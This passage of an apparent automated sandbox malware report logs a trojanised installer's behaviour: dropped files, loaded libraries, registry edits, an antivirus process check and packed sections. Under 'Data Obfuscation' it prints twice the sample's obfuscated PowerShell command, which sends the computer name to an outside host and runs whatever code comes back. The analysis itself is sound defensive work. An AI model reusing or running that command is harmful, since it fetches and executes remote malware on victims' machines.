              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: msvfw32.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: msacm32.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: winmmbase.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: winmmbase.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: olepro32.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: winhttp.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: windowscodecs.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: twinui.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: powrprof.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: pdh.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: umpdc.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: shdocvw.dll
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpWindow found: window name: TMainFormJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: @Setup.exeStatic file information: File size 74057612 > 1048576
              Source: Binary string: wntdll.pdbUGP source: vsv_tool.exe, 00000025.00000002.3046312161.0000000044540000.00000004.00000800.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000002.3040984180.00000000441E8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: vsv_tool.exe, 00000025.00000002.3046312161.0000000044540000.00000004.00000800.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000002.3040984180.00000000441E8000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Suspicious powershell command line found
              Source: C:\Users\user\Desktop\@Setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?
              Source: C:\Users\user\Desktop\@Setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?Jump to behavior
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp.6.drStatic PE information: real checksum: 0x33908a should be: 0x33ab8c
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp.8.drStatic PE information: real checksum: 0x33908a should be: 0x33ab8c
              Source: @Setup.exeStatic PE information: section name:
              Source: @Setup.exeStatic PE information: section name:
              Source: @Setup.exeStatic PE information: section name:
              Source: @Setup.exeStatic PE information: section name:
              Source: @Setup.exeStatic PE information: section name:
              Source: @Setup.exeStatic PE information: section name:
              Source: @Setup.exeStatic PE information: section name:
              Source: @Setup.exeStatic PE information: section name:
              Source: @Setup.exeStatic PE information: section name:
              Source: @Setup.exeStatic PE information: section name:
              Source: @Setup.exeStatic PE information: section name: .adata
              Source: NBKXWJSCH7YAAAADC9LJIYY.exe.0.drStatic PE information: section name: .didata
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp.6.drStatic PE information: section name: .didata
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp.8.drStatic PE information: section name: .didata
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0092E8BE push eax; mov dword ptr [esp], 03020130h0_2_0092E8BF
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0092BC4E push eax; mov dword ptr [esp], C9D6D7D4h0_2_0092BC5C
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeCode function: 37_2_0055C068 push ecx; mov dword ptr [esp], edx37_2_0055C06C
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeCode function: 37_2_0055C505 push 74000000h; iretd 37_2_0055C50D
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeCode function: 37_2_0055C008 push ecx; mov dword ptr [esp], edx37_2_0055C00C
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeCode function: 37_2_0055C384 push 0055C3B0h; ret 37_2_0055C3A8
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeCode function: 37_2_008C8F56 pushfd ; iretd 37_2_008C8F8B
              Source: @Setup.exeStatic PE information: section name: entropy: 7.9592966862361605
              Source: @Setup.exeStatic PE information: section name: entropy: 7.992374830519767
              Source: @Setup.exeStatic PE information: section name: entropy: 7.985656497961463
              Source: @Setup.exeStatic PE information: section name: entropy: 7.875711885838061
              Source: @Setup.exeStatic PE information: section name: entropy: 7.9979949916200175
              Source: @Setup.exeStatic PE information: section name: .data entropy: 7.844543785300352
              Source: @Setup.exeStatic PE information: section name: .adata entropy: 7.563705339735837
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpFile created: C:\Users\user\AppData\Local\Temp\is-RPL3R.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exeFile created: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpFile created: C:\Users\user\AppData\Local\Temp\is-3URAC.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpFile created: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe (copy)Jump to dropped file
              Source: C:\Users\user\Desktop\@Setup.exeFile created: C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpFile created: C:\Users\user\AppData\Local\Temp\is-3URAC.tmp\_isetup\_isdecmp.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exeFile created: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpFile created: C:\Users\user\AppData\Roaming\UltraMedia\is-C1AV0.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpFile created: C:\Users\user\AppData\Local\Temp\is-RPL3R.tmp\_isetup\_isdecmp.dllJump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
